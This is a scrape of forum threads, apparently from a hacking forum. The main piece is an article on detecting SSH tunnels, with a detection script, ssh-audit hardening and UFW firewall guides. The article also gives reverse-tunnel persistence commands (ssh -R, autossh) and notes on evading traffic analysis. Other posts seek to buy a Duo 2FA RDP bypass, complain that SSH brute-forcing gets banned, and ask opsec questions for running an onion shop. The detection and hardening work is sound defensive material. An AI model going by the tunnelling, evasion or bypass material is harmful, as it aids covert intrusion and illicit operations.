Обнаружение SSH-туннелей по размеру пакетов

ID: 676533bbb4103b69df371990
Thread ID: 110825
Created: 2024-03-19T20:14:35+0000
Last Post: 2024-03-19T20:14:35+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 195

Протокол SSH — очень мощный инструмент, который используется для удалённой консоли или передачи файлов (scp, sftp). Есть менее известная функция перенаправления портов. Такие SSH-туннели используются для пробития файрволов и хорошо скрываются от обнаружения стандартными средствами мониторинга типа Trisul, Zeek (ранее был известен как Bro), Suricata и Snort. Поэтому для их обнаружения в корпоративной сети используются другие методы.

Например, разработчики инструмента для сетевого мониторинга Trisul Network Analytics несколько лет назад опубликовали небольшое руководство по методам обнаружения SSH-туннелей. Они напоминают, что ещё во второй версии SSH 2 появилась поддержка SOCKS5, а это позволяет любому желающему установить полноценный SOCKS5-прокси вне корпоративной сети и скрыть всю HTTP-активность от инструментов сетевого мониторинга.

После обмена ключами SSH эффективно скрывает от посторонних глаз весь трафик внутри туннеля.

В статье «Практические советы, примеры и туннели SSH» на Хабре рассказывалось про два типа туннелей SSH.

Прямой и обратный SSH-туннели

Самый простой прямой туннель открывает порт в вашей локальной системе, который подключается к другому порту на другом конце туннеля.

Code:Copy to clipboard

localhost:~$ ssh -L 9999:127.0.0.1:80 user@remoteserver

С другой стороны, при организации обратного туннеля мы настраиваем прослушивающий порт на удалённом сервере, который будет подключаться обратно к локальному порту на нашем localhost (или другой системе):

Code:Copy to clipboard

localhost:~$ ssh -v -R 0.0.0.0:1999:127.0.0.1:902 192.168.1.100 user@remoteserver

Для управления такими туннелями часто используется популярная утилита autossh, которая постоянно отслеживает состояние туннеля через дополнительные healthcheck-порты и перезапускает основной туннель в случае сетевого сбоя.

AutoSSH принимает те же аргументы для переадресации портов, что и SSH:

Code:Copy to clipboard

autossh -R 2222:localhost:22 ssh-server

Такой туннель будет автоматически восстанавливаться после потери связи.

Тут нужно отметить два момента, которые затрудняют отслеживание туннелей внутри сети.

Во-первых, пользователь может поддерживать такое соединение в постоянном режиме, то есть 24/7, получив постоянную точку присутствия в нашей сети.

Во-вторых, динамическое перенаправление портов можно использовать в качестве прокси, то есть для перенаправления трафика через зашифрованный туннель.

Что же можно сделать для обнаружения SSH-туннелей?

Обнаружение туннелей по размеру пакетов

В упомянутой программе Trisul для обнаружения туннелей используются трекеры потоков (flow trackers), которые в реальном времени снимаются снапшоты отдельных потоков, которые соответствуют параметрам, указанным при создании трекера.

Все SSH-потоки внутри сети можно отсортировать по объёму трафика и продолжительности соединения. Потенциально вредоносные обратные SSH-туннели от злоумышленников обычно не передают много данных, а находятся в «спящем» режиме, просто поддерживая соединение как точку присутствия в системе.

В системе анализа трафика можно создать «белый список» туннелей между легитимными точками. Остальные можно выявлять с помощью анализа трафика в инструментах вроде Zeek. В частности, по размеру пакетов можно выявить нажатия клавиш в терминале :

Когда SSH туннелирует другой SSH-канал, передающий TTY-трафик, то

длина пакета = SSH-заголовок + [предыдущий SSH-пакет] + HMAC

Это может быть 76, 84, 98 байт и т. д. Точная длина зависит от размера блока шифрования и алгоритма HMAC, реализации клиентов и серверов.

Каждое нажатие клавиши отражается эхом, поэтому можно настроить инструмент мониторинга для обнаружения последовательных пакетов типа Server:76, Client:76, S:76, C:76, S:76, C:76. Такая последовательность почти наверняка означает, что в данный момент человек набирает текст в интерактивном терминале в SSH-туннеле и получает ответное эхо. Всё просто.

Например, такой [скрипт на Lua](https://github.com/trisulnsm/trisul- scripts/tree/master/lua/frontend_scripts/reassembly/revssh) на базе другого скрипта-реассемблера TCP в случае обнаружения пакета размером 76 байт увеличивает счётчик.

Code:Copy to clipboard

-- WHEN CALLED: when a chunk of reassembled payload is available -- -- see note for why we check the flowkey again , to co-operate with other reassembly scripts onpayload = function(engine, timestamp, flowkey, direction, seekpos, buffer) if flowkey:id():match("p-0016") == nil then return; end local MAGIC_SEGMENT_LENGTH = 76 local CHARACTERS_TRIGGER = 3 local MIN_ALERT_INTERVAL_SECS = 300 local sshF = T.SshFlowTable[ flowkey:id() ] if sshF.seekpos[direction]==seekpos then return -- no new data end if buffer:size() == MAGIC_SEGMENT_LENGTH then sshF.hits[direction] = sshF.hits[direction] + 1 sshF.seekpos[direction]=seekpos; else sshF.hits[0] = 0 sshF.hits[1] = 0 sshF.seekpos[direction]=seekpos; end -- print("Payload length for session "..flowkey:id().. "direction = ".. direction.." bufsz=".. buffer:size() .. " seekpos = "..seekpos ) if sshF.hits[0] >= CHARACTERS_TRIGGER and sshF.hits[1] >= CHARACTERS_TRIGGER then sshF.hits[0] = 0 sshF.hits[1] = 0 if timestamp-sshF.lastalertts<MIN_ALERT_INTERVAL_SECS then T.log("Found Rev SSH "..flowkey:to_s().." but not alerting due to threshold interval") else T.log("Found Rev SSH "..flowkey:to_s().." ALERTING and TAGGING flow") -- tag flow engine:tag_flow(flowkey:id(),"REVSSH"); -- alert engine:add_alert("{B5F1DECB-51D5-4395-B71B-6FA730B772D9}", flowkey:id(),"REVSSH",1,"rev ssh detected by keypress detect method"); sshF.lastalertts=timestamp end end end,

Для более эффективного решения нужно учитывать и пакеты большего размера. Дело в том, что размер пакетов SSH-туннелей варьируется в зависимости от алгоритма HMAC и типа шифрования.Можно обновить скрипт или использовать несколько размеров пакетов, чтобы поймать все алгоритмы HMAC и комбинации шифрования:

Code:Copy to clipboard

local MAGIC_SEGMENT_LENGTH = 76 local CHARACTERS_TRIGGER = 3 local MIN_ALERT_INTERVAL_SECS = 300

Подходящий под заданные условия можно пометить соответствующим тегом или генерировать оповещения.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fr%2Fw1560%2Fwebt%2Fif%2Fo1%2Frv%2Fifo1rvwpnp --sqn6y3_v6-1my20.png&hash=9ff5ef507f95c4e1d00e05e0fcf6136d)

Защита SSH-сервера и клиента. Усиление конфигурации

Нужно заметить, что многие ОС по умолчанию настроены на удобство работы, а не на безопасность. Поэтому в большинстве случае настройки нуждаются в усилении.

ssh-audit — инструмент для аудита конфигурации ssh-сервера и клиента.

Основные функции:

поддержка серверов протоколов SSH1 и SSH2;

анализ конфигурации SSH-клиента;

распознавание устройства, программного обеспечения и операционной системы, определение компрессии;

сборка обмена ключами, ключей хостов, шифрования и кодов аутентификации сообщений;

вывод информации об алгоритме (с какого времени доступен, удалён/отключён, небезопасен/слаб/устарел и т. д.);

вывод рекомендаций по алгоритмам (добавлять или удалять в зависимости от версии распознанного ПО);

вывод информации о безопасности (связанные проблемы, список CVE и т. д.);

анализ совместимости версий SSH на основе информации об алгоритмах;

историческая информация из OpenSSH, Dropbear SSH и libssh;

сканирование политик для обеспечения усиленной/стандартной конфигурации;

работает под Linux и Windows;

поддерживает Python 3.8−3.12;

отсутствие зависимостей.

Стандартный аудит можно запустить для одного сервера…

Code:Copy to clipboard

ssh-audit localhost ssh-audit 127.0.0.1 ssh-audit 127.0.0.1:222 ssh-audit ::1 ssh-audit [::1]:222

…или для многих серверов из списка:

Code:Copy to clipboard

ssh-audit -T servers.txt

Выдача стандартного серверного аудита выглядит следующим образом (подключение через OpenSSH 5.3, неусиленный):

Стандартный аудит клиента (OpenSSH 7.2, неусиленный):

Кроме утилиты командной строки, для удобства реализован веб- интерфейс, через который она запускается:

Этот сервис чем-то похож на SSL Server Test для быстрого аудита конфигурации SSL.

Вместе с программой распространяются советы по улучшению конфигурации с целью повышения безопасности SSH для разных дистрибутивов Linux. Советы актуальны для последних версий серверных дистрибутивов Amazon Linux 2023, Debian 11−12, RedHat Enterprise Linux 7−8, CentOS 7−8, Rocky Linux 9, Ubuntu 18−22, а также клиентских Ubuntu 18−22 и Mint 19−21. Советы для свежих ОС составлены на основе этого документа 2015 года, который сейчас уже устарел. Там же неофициальные руководства по SSH для MacOS13−14, FreeBSD нескольких версий, различных маршрутизаторов и других устройств типа Synology DSM.

Например, усиление конфигурации на сервере Ubuntu 22.04 LTS включает пять пунктов:

Перегенерировать ключи RSA и ED25519

Code:Copy to clipboard

rm /etc/ssh/ssh_host_* ssh-keygen -t rsa -b 4096 -f /etc/ssh/ssh_host_rsa_key -N "" ssh-keygen -t ed25519 -f /etc/ssh/ssh_host_ed25519_key -N ""

Удалить модуль для маленьких ключей по алгоритму Диффи — Хеллмана

Code:Copy to clipboard

awk '$5 >= 3071' /etc/ssh/moduli > /etc/ssh/moduli.safe<br> mv /etc/ssh/moduli.safe /etc/ssh/moduli

Активировать ключи RSA и ED25519
Активировать директиву HostKey для RSA и ED25519 в файле /etc/ssh/sshd_config :

Code:Copy to clipboard

sed -i 's/^\#HostKey \/etc\/ssh\/ssh_host_$rsa\|ed25519$_key$/HostKey \/etc\/ssh\/ssh_host_\1_key/g' /etc/ssh/sshd_config

Ограничить поддерживаемые алгоритмы обмена ключами, шифровальные алгоритмы и MAC

Code:Copy to clipboard

echo -e "# Ограничение алгоритмов в соответствии с рекомендациями sshaudit.com\nKexAlgorithms sntrup761x25519-sha512@openssh.com,curve25519-sha256,curve25519-sha256@libssh.org,gss-curve25519-sha256-,diffie-hellman-group16-sha512,gss-group16-sha512-,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha256\n\nCiphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr\n\nMACs hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,umac-128-etm@openssh.com\n\nHostKeyAlgorithms sk-ssh-ed25519-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,sk-ssh-ed25519@openssh.com,ssh-ed25519,rsa-sha2-512,rsa-sha2-256\n\nCASignatureAlgorithms sk-ssh-ed25519@openssh.com,ssh-ed25519,rsa-sha2-512,rsa-sha2-256\n\nGSSAPIKexAlgorithms gss-curve25519-sha256-,gss-group16-sha512-\n\nHostbasedAcceptedAlgorithms sk-ssh-ed25519-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519@openssh.com,ssh-ed25519,rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-256\n\nPubkeyAcceptedAlgorithms sk-ssh-ed25519-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519@openssh.com,ssh-ed25519,rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-256" > /etc/ssh/sshd_config.d/ssh-audit_hardening.conf

Перезагрузить сервер OpenSSH

Code:Copy to clipboard

service ssh restart

Кроме этого, для повышения безопасности SSH рекомендуется отключить вход по паролю.

См. также [подсказки по командам SSH](https://www.stationx.net/ssh-commands- cheat-sheet/) (cheat sheet).

На Хабре также публиковались неплохие материалы, как вышеупомянутая статья с практическими примерами использования туннелей SSH. Например, там приводятся примеры удалённого выполнения команд, удалённого перехвата пакетов, копирования файлов, туннелирования SSH-трафика через сеть Tor, передачи потокового видео по SSH с помощью VLC и SFTP и др.

Скрытие SSH от обнаружения

Вероятно, чтобы скрыть свой SSH-туннель от обнаружения методом анализа сетевого трафика по размеру пакетов, нам нужно изменить стандартный размер пакетов.

В 2023 году в ssh(1) и OpenSSH внесено важное изменение с поддержкой обфускации тайминга нажатий клавиш, то есть интервалов между временем нажатия клавиш на клавиатуре.

Чтобы скрыть промежуток между нажатиями, ssh в случае малого количества трафика отправляет его по сети с фиксированными интервалами 20 мс, а также добавляет «фальшивые» нажатия. В документации появилась новая опция ObscureKeystrokeTiming.

Методы скрытия SSH от обнаружения особенно актуальны в Китае и других странах, где применяется технология DPI для фильтрации трафика и обнаружения/замедления трафика SSH. По некоторой информации, в качестве альтернативы VPN китайцы используют SOCKS-прокси через SSH на свой сервер за пределами подцензурной сети, и через него туннелируется весь TCP- и DNS-трафик (см. проект sshuttle), но это тоже обнаруживается средствами DPI.

Возможности Великого китайского файрвола подробно изучаются и тестируются специалистами из разных стран. В прошлом году группа исследователей опубликовала отчёт о методах обнаружения зашифрованного трафика в Китае, а также способах его обфускации.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fr%2Fw1560%2Fwebt%2Ffn%2Fbw%2Fdz%2Ffnbwdzsky51iafhsqhjyek_- tzy.png&hash=3c54a2d9fef68fa7893f5c93fc9b8964)
Примеры заблокированных и незаблокированных пакетов, которые прошли через Великий китайский файрвол

Исследование показало, что китайская цензура динамически блокирует полностью зашифрованный трафик в режиме реального времени. Новая технология DPI частично или полностью затронула многие инструменты обхода блокировок, включая Shadowsocks, Outline, VMess, Obfs4, Lantern, Psiphon и Conjure.

Как выяснилось, DPI применяет грубую, но эффективную эвристику: сначала исключается трафик, который вряд ли является полностью зашифрованным; а потом блокируется оставшийся неисключённый трафик. Эвристики основаны на фингерпринтинге распространённых протоколов, частоте установленных бит, а также на количестве, доле и положении печатаемых символов ASCII. При широком применении система потенциально блокирует около 0,6% обычного интернет- трафика.

Учёные детально изучили алгоритмы динамической блокировки — и в своей работе представили эффективные стратегии обхода для разработчиков антицензурных инструментов.

Автор @programmerguru
Источник habr.com

Какие VPN заблокированы ?

ID: 676533bbb4103b69df371aaa
Thread ID: 74242
Created: 2022-10-12T03:23:17+0000
Last Post: 2022-10-12T05:11:09+0000
Author: boagrd
Replies: 2 Views: 193

Список VPN-сервисов, которые заблокированы на территории России
Есть ли какой нибудь ресурс - мониторинг , актуальный список ?

SSH TUNNELING

ID: 676533bbb4103b69df371aef
Thread ID: 70387
Created: 2022-07-20T08:53:17+0000
Last Post: 2022-07-20T12:45:42+0000
Author: neofit
Replies: 2 Views: 192

Прив! Брут ссш по каким то пичинам банят везде, да я знаю что машинка работает
очень не долго - логи -требования правительства выдать их, VPN на сервере что это?
Любая кантора вас просто сдаст! И это факт!
Давайте поговорим о темах безопасности)

Duo security 2FA RDP login bypass

ID: 676533bbb4103b69df371afd
Thread ID: 68970
Created: 2022-06-21T02:33:21+0000
Last Post: 2022-06-21T02:33:21+0000
Author: komarenko
Replies: 0 Views: 190

Does anyone aware of Duo security 2FA RDP login bypass?
I am gonna buy if possible./

Tunnelbick VS Viscosity

ID: 676533bbb4103b69df371bac
Thread ID: 56284
Created: 2021-09-04T22:42:41+0000
Last Post: 2021-09-04T22:42:41+0000
Author: Lescer
Replies: 0 Views: 188

Всем доброго времени суток. Недавно наткнулся на платный опен впн клиент - Viscosity. Кто юзал - как она по сравнению с Tunnelblick? Какие плюсы и минусы ? Насколько я понимаю, то Туннельблик надежнее выглядит так как опенсорс. А вискозити АУ контора.

What everything can send me in Jail

ID: 676533bbb4103b69df371b49
Thread ID: 62654
Created: 2022-02-08T18:46:39+0000
Last Post: 2022-02-08T18:46:39+0000
Author: Azuret-Calyx
Replies: 0 Views: 186

Hello everyone i have own simple store ( i dont sell nothing here i just ask what can be dangerous )
so back to topic everything what i do with most simple way

for example "offshore vps" ( its paid with xmr any link to my email or etc )
here i dont store nothing sensitive what can make problem ( once again simple php and database )

every time when i connect to vps "vpn--->tor ( proxychains )"
i can be sure provider capture who connect on vps and make some log ( so this can be problem )

to be sure its not need javascript and everytime when i go on onion over tor browser ( i have permanent disable javascipt )
so what everything i storage on vps ? | simple script,database with username,password" and onion v3 private and public key )

for example payments use static xmr or btc address
also after onion is online ( i dont edit,change script because i worried someone can hack or etc )

once again i dont offer or sell to users on dread i just want know what everything can happened
-example seized ( but now we talk when its market and not stupid shop )
-hacked ( i am not cybersecurity expert but i am sure any serious exploits not include script )

thats all thanks everyone for comment which can help me
be everyone safe

Нужна помощь с скачиванием информации по SFTP

ID: 676533bbb4103b69df371b86
Thread ID: 58341
Created: 2021-10-30T11:37:47+0000
Last Post: 2021-10-30T11:37:47+0000
Author: crypt_on
Replies: 0 Views: 186

Всем доброго времени суток!
Не могу разобраться с скачиванием информации по sftp. Конкретно интересует построить скачивание через две-три прокладки.

Как настроить брандмауэр UFW в системах Linux

ID: 676533bbb4103b69df371a5b
Thread ID: 88590
Created: 2023-05-22T11:27:17+0000
Last Post: 2023-05-22T13:03:05+0000
Author: DedJhones
Replies: 1 Views: 185

Это руководство объясняет, что такое UFW, как установить UFW на Linux и как настроить брандмауэр UFW в различных операционных системах Linux.

Введение

Безопасность – это серьезное дело.

Click to expand...

Работаете ли вы с операционной системой Linux в центрах обработки данных или на своем ноутбуке, вы должны защитить свою операционную систему от всех возможных угроз.

Click to expand...

На самом деле, серверы, работающие в корпоративной среде, будут хорошо защищены. Большинство корпоративных компаний инвестируют миллионы долларов в защиту своей инфраструктуры. Там будет отдельная сетевая команда, множество брандмауэров, команда безопасности для защиты вашей среды и серверов Linux. Этого не произойдет, если вы используете Linux на своих настольных компьютерах или серверах. Вы должны знать, как защитить свои Linux-машины с помощью правильных инструментов. Одним из таких инструментов является UFW.

Что такое UFW?

UFW, расшифровывается как Uncomplicated Firewall, это программа межсетевого экрана, которая по умолчанию предустановлена в дистрибутивах на базе Ubuntu.

Почему UFW, а не iptables?

Вы можете задаться этим вопросом. Если вы еще не знаете, Netfilter – это система фильтрации пакетов, поставляемая с ядром Linux, а iptables используется для управления сетевыми фильтрами с помощью набора команд. Освоение iptables может занять много времени и оказаться сложной задачей. Чтобы упростить управление брандмауэром, было создано множество дополнений к iptables. UFW является одним из них. UFW является интерфейсом командной строки для управления iptables. Он обеспечивает основу для управления и манипулирования брандмауэром netfilter. UFW доступен по умолчанию во всех установках Ubuntu после версии 8.04 LTS. Существует также графический интерфейс для UFW под названием Gufw. О нем мы расскажем в отдельном руководстве. В этой статье мы сосредоточимся на использовании ufw из командной строки. Без лишних слов, давайте посмотрим, как установить и настроить брандмауэр UFW в Linux.

1. Установка UFW на Linux

UFW поставляется предустановленным в большинстве дистрибутивов на базе Debian и Arch.

Чтобы проверить, установлен UFW или нет, выполните следующую команду:

Code:Copy to clipboard

which ufw /usr/sbin/ufw ufw version ufw 0.36 Copyright 2008-2015 Canonical Ltd.

Если он не установлен в вашем дистрибутиве, вы можете установить его с помощью менеджера пакетов по умолчанию вашего дистрибутива.

Чтобы установить UFW в Alpine Linux, выполните:

sudo apk add ufw

Установка UFW в Arch Linux и его разновидности, такие как EndeavourOS и Manjaro Linux:

sudo pacman -S ufw

Установка ufw в Debian, Ubuntu и их производных:

sudo apt update sudo apt install ufw

Установка UFW в Fedora:

sudo dnf install ufw

UFW доступен в репозитории [EPEL] для операционных систем Enterprise Linux, таких как RHEL, CentOS, AlmaLinux и Rocky Linux.

Включите репозиторий [EPEL] и установите UFW в RHEL, CentOS, AlmaLinux, Rocky Linux, как показано ниже:

sudo dnf install epel-release
sudo dnf install ufw

Установка UFW на openSUSE:

sudo zypper install ufw

1.1. Включение, запуск и остановка службы UFW

В системах на базе Debian демон UFW будет запущен и включен автоматически.

Выполните следующую команду, чтобы проверить состояние службы UFW:

systemctl status ufw

Пример вывода:

● ufw.service - Uncomplicated firewall
Loaded: loaded (/usr/lib/systemd/system/ufw.service; enabled; vendor prese>
Active: active (exited) since Mon 2021-07-05 20:08:01 IST; 44s ago
Docs: man:ufw(8)
man:ufw-framework(8)
file://usr/share/doc/ufw/README
Process: 21690 ExecStart=/usr/libexec/ufw/ufw-init start (code=exited, stat>
Main PID: 21690 (code=exited, status=0/SUCCESS)
CPU: 169ms

Jul 05 20:08:01 itsecforu systemd[1]: Starting Uncomplicated firewall...
Jul 05 20:08:01 itsecforu systemd[1]: Finished Uncomplicated firewall.

Click to expand...

Другой способ – проверить, включен ли и активен ли сервис UFW:

systemctl is-enabled ufw enabled systemctl is-active ufw active

Если служба UFW не запускается автоматически после установки, выполните следующую команду для запуска службы UFW:

sudo systemctl start ufw

Ufw также должен быть включен для автоматического запуска между перезагрузками системы.

sudo systemctl enable ufw

Или вы можете объединить обе команды в одну, чтобы включить и запустить службу UFW одним движением, как показано ниже:

sudo systemctl enable --now ufw

Чтобы остановить службу UFW, просто выполните команду:

sudo systemctl stop ufw

3. Настройка брандмауэра с помощью UFW в Linux

3.1. Получение помощи

Если вы новичок в UFW, первое, что нужно сделать после его установки, это обратиться к разделу справки и man-странице UFW, чтобы получить базовое представление об использовании UFW.

ufw --help man

Если вы забыли синтаксис или вам нужна справка по определенной функции ufw, эти две команды будут очень кстати.

3.2. Установка правил по умолчанию

Используя UFW, вы можете создавать правила брандмауэра (или политики) для разрешения или запрета определенной службы. С помощью этих политик вы указываете UFW, какие порты, службы, IP-адреса и интерфейсы должны быть разрешены или запрещены. Существуют политики по умолчанию, которые поставляются с ufw. Политика по умолчанию отбрасывает все входящие соединения и разрешает все исходящие соединения.

ВАЖНО: Если вы настраиваете ufw на удаленном сервере, убедитесь, что вы разрешили порт или службу ssh перед включением брандмауэра ufw.

Click to expand...

Политика входящих соединений по умолчанию будет запрещать все входящие соединения.

Click to expand...

Поэтому если вы не настроили правила для разрешения SSH, вы будете заблокированы в удаленной системе и не сможете войти в нее.

Click to expand...

Этого не произойдет, если вы запустите ufw на локальной системе.

Click to expand...

Политики по умолчанию определяются в файле /etc/default/ufw.

Вот содержимое этого файла:

В качестве альтернативы можно использовать команду ufw allow, чтобы установить политики по умолчанию для входящих и исходящих команд:

sudo ufw default deny incoming
sudo ufw default allow outgoing

3.2.1. Проверка состояния правил межсетевого экрана UFW

Чтобы проверить, активны ли политики по умолчанию, выполните следующую команду:

sudo ufw status

Вывод:

Status: active

To Action From
-- ------ ----
SSH ALLOW Anywhere
224.0.0.251 mDNS ALLOW Anywhere
SSH (v6) ALLOW Anywhere (v6)
ff02::fb mDNS ALLOW Anywhere (v6)

Click to expand...

А для получения более подробной информации о состоянии используйте эту команду:

sudo ufw status verbose

Вывод:

Status: active
Logging: on (low)
Default: deny (incoming), allow (outgoing), deny (routed)
New profiles: skip

To Action From
-- ------ ----
22/tcp (SSH) ALLOW IN Anywhere
224.0.0.251 5353/udp (mDNS) ALLOW IN Anywhere
22/tcp (SSH (v6)) ALLOW IN Anywhere (v6)
ff02::fb 5353/udp (mDNS) ALLOW IN Anywhere (v6)

Click to expand...

Чтобы просмотреть нумерованный формат, выполните команду:

sudo ufw status numbered

3.2.2. Добавление правил

Давайте на примере SSH продемонстрируем, как добавлять правила брандмауэра с помощью команды ufw.

Посмотрите на приведенные ниже команды:

[1] sudo ufw allow ssh
[2] sudo ufw allow 22
[3] sudo ufw allow 22/tcp
[4] sudo ufw allow 2222/tcp

Все команды служат одной цели.

[ 1] – В первой команде я разрешаю весь доступ к службе ssh. UFW знает, что по умолчанию ssh прослушивает порт 22. Поэтому, когда вы используете разрешить службу ssh, он также применит правило для порта 22.

[ 2 ] – Во второй команде я явно указываю разрешить входящие соединения для порта 22.

[ 3 ] – Третья команда аналогична второй. Она разрешает любой доступ к порту tcp 22. Поддерживаются оба протокола TCP и UDP.

[ 4 ] – В четвертой команде я разрешаю пользовательскому порту ssh (т.е. 2222) принимать входящие соединения.Вы можете использовать эти четыре команды не только для ssh, но и для любых служб и портов.

Например, если вы хотите подключиться к PostgreSQL, работающему на порту 5433, то правило должно быть добавлено следующим образом.

sudo ufw allow 5433

Аналогично, мы можем использовать команду ufw deny для отклонения входящих соединений:

sudo ufw deny 5433

Эта команда запретит трафик на порту 5433.

3.2.3. Удаление правил межсетевого экрана UFW

Чтобы удалить правило или политику, вы можете использовать команду ufw delete. Например, если вы больше не хотите разрешать HTTP-трафик, просто выполните команду:

sudo ufw delete allow 80

3.2.4. Включение, отключение и перезагрузка правил брандмауэра UFW

Это отличается от включения и запуска демона UFW. Запуск системного блока ufw не приведет к выполнению правил брандмауэра. UFW имеет специальные команды для включения, отключения и перезагрузки правил брандмауэра.

Чтобы правила вступили в силу, необходимо выполнить следующую команду:

sudo ufw enable

Firewall is active and enabled on system startup

Click to expand...

Как я уже упоминал, используйте следующую команду для просмотра состояния правил брандмауэра UFW:

sudo ufw status

Вывод:

Status: active

To Action From
-- ------ ----
SSH ALLOW Anywhere
224.0.0.251 mDNS ALLOW Anywhere
SSH (v6) ALLOW Anywhere (v6)
ff02::fb mDNS ALLOW Anywhere (v6)

Click to expand...

Чтобы отключить правила брандмауэра, выполните команду:

sudo ufw disable

Firewall stopped and disabled on system startup

Click to expand...

Обратите внимание: приведенная выше команда отключит только правила брандмауэра. Демон UFW будет по-прежнему запущен и включен при перезагрузке.

Click to expand...

После добавления любой политики перезагрузите ufw, чтобы политика вступила в силу, используя команду :

sudo ufw reload

3.2.5. Добавление политики для диапазона портов

Вы можете добавить политику для диапазона портов вместо того, чтобы создавать политику для одного порта:

sudo ufw allow 8000:8080/tcp
sudo ufw deny 8000:8080/tcp

3.2.6. Добавление политики для определенных IP-адресов, подсетей и

портов

С помощью ufw можно создавать более тонкие правила.

Допустим, если вы хотите, чтобы к вашему серверу можно было подключиться (ssh’ed) только с определенного IP, вы можете сделать это, добавив следующее правило.

[1] sudo ufw allow from 192.168.156.2
[2] sudo ufw allow from 192.168.156.2 to any port 2222

[1] - Первая команда позволяет указанному IP подключаться на основе открытых портов.

[2] - Вторая команда указывает, что пользователь может подключиться к порту 2222 только с адреса 192.168.156.2.

Чтобы разрешить группе IP из одной подсети подключаться к ssh, вы можете использовать подсеть при добавлении правила, разрешая всем IP этой подсети подключаться к порту 2222.

sudo ufw allow from 192.168.156.1/24 to any port 2222

3.2.7. Добавление политики сетевого интерфейса

Вы также можете создавать политики на основе сетевых интерфейсов.

Следующая команда создаст политику приема соединений для сетевого интерфейса en01 на порт 2222.

sudo ufw allow in on en01 to any port 2222

3.2.8. Тестирование правил без их применения с помощью опции dry-run

UFW имеет опцию –dry-run для тестирования правил без их фактического применения.

Например, при открытии порта SSH будет применено следующее:

sudo ufw --dry-run allow ssh

Как видно из приведенного выше результата, команда ufw выводит только результирующие правила, но не применяет их, когда мы добавляем опцию –dry-run. Это удобно, когда вы хотите протестировать какие-либо политики брандмауэра.

4. Какое правило получает приоритет?

Приоритет важен, когда вы создаете несколько правил для одной и той же службы/порта. Политики получают приоритет в порядке их создания.

Выполните следующую команду, которая выдаст вам политику вместе с ее приоритетом.

sudo ufw status numbered

Пример вывода:

Status: active

To Action From
-- ------ ----
[ 1] 22 ALLOW IN Anywhere
[ 2] 2222 ALLOW IN Anywhere
[ 3] 2222 ALLOW IN 192.168.156.2
[ 4] 2222 DENY IN 192.168.157.0/24
[ 5] 22 (v6) ALLOW IN Anywhere (v6)
[ 6] 2222 (v6) ALLOW IN Anywhere (v6)

Click to expand...

Посмотрите на [ 4 ] в приведенном выше выводе.

Любое подключение к порту 2222 из подсети 192.168.157.0/24 должно быть отброшено. Но когда я попытаюсь подключиться с любой машины из подсети, соединение будет разрешено, поскольку высокий приоритет был присвоен [ 2 ]. Чтобы отменить такое поведение, необходимо создать правила с приоритетом.

Вы можете удалить существующее правило и добавить новое правило с приоритетом и перезагрузить службу.

sudo ufw delete 4

Deleting:
deny from 192.168.157.0/24 to any port 2222
Proceed with operation (y|n)? y
Rule deleted
$ sudo ufw insert 2 deny from 192.168.157.0/24 to any port 2222
Rule inserted
$ sudo ufw reload
Firewall reloaded
$ sudo ufw status numbered
Status: active
To Action From
-- ------ ----
[ 1] 22 ALLOW IN Anywhere
[ 2] 2222 DENY IN 192.168.157.0/24
[ 3] 2222 ALLOW IN Anywhere
[ 4] 2222 ALLOW IN 192.168.156.2
[ 5] 22 (v6) ALLOW IN Anywhere (v6)
[ 6] 2222 (v6) ALLOW IN Anywhere (v6)

Click to expand...

Посмотрите на приведенный выше результат.

Приоритет переназначен на [ 2 ] и теперь, если я попытаюсь подключиться к порту 2222 с адреса 192.168.157.0/24, мое соединение будет отклонено.

sudo ufw logging off

Logging disabled

Click to expand...

5. Ведение логов UFW

Логи – лучший вариант, если что-то пошло не так.

Чтобы отключить ведение журнала UFW, выполните следующую команду:

sudo ufw logging off

Logging disabled

Click to expand...

Чтобы включить ведение логов UFW, выполните команду:

sudo ufw logging on

Logging enabled

Click to expand...

Существует четыре уровня ведения логов, а именно: low, medium, high, и full. В зависимости от выбранного уровня логи будут генерироваться в файл /var/log/ufw.log. По умолчанию уровень логов будет low

Вы можете использовать приведенную ниже команду для установки нужного уровня:

sudo ufw logging [ high | medium | Full | Low ]

Чтобы проверить состояние ведения журнала и уровень логов, выполните команду ufw status и найдите запись о ведении журнала.

sudo ufw status verbose

Status: active
Logging: on (high)
Default: deny (incoming), allow (outgoing), deny (routed)
New profiles: skip

Click to expand...

6. Профили приложений

Когда вы устанавливаете какие-либо пакеты с помощью менеджера пакетов (например, apt или pacman), в ufw будет создан профиль приложения, определяющий правила для этого пакета. Например, если вы устанавливаете сервер OpenSSH с помощью apt, то профиль будет создан для порта 22. Все профили приложений хранятся в каталоге /etc/ufw/applications.d.

Чтобы получить список профилей приложений, выполните следующую команду:

sudo ufw app list

Пример вывода:

Available applications:
CUPS
OpenSSH

Click to expand...

Это тестовая машина. Я установил только OpenSSH. Поэтому вы видите только два профиля.

Чтобы получить подробную информацию об этом профиле и о том, какую политику он применяет, выполните следующую команду:

sudo ufw app info 'OpenSSH'

Пример вывода:

Profile: OpenSSH
Title: Secure shell server, an rshd replacement
Description: OpenSSH is a free implementation of the Secure Shell protocol.
Port:
22/tcp

Click to expand...

7. Сброс брандмауэра UFW к политике по умолчанию

Если вы хотите очистить все созданные вами правила и сбросить их к политике по умолчанию, вы можете сделать это, выполнив команду ufw reset.

sudo ufw reset

Пример вывода:

Resetting all rules to installed defaults. Proceed with operation (y|n)? y
Backing up 'user.rules' to '/etc/ufw/user.rules.20210705_131655'
Backing up 'before.rules' to '/etc/ufw/before.rules.20210705_131655'
Backing up 'after.rules' to '/etc/ufw/after.rules.20210705_131655'
Backing up 'user6.rules' to '/etc/ufw/user6.rules.20210705_131655'
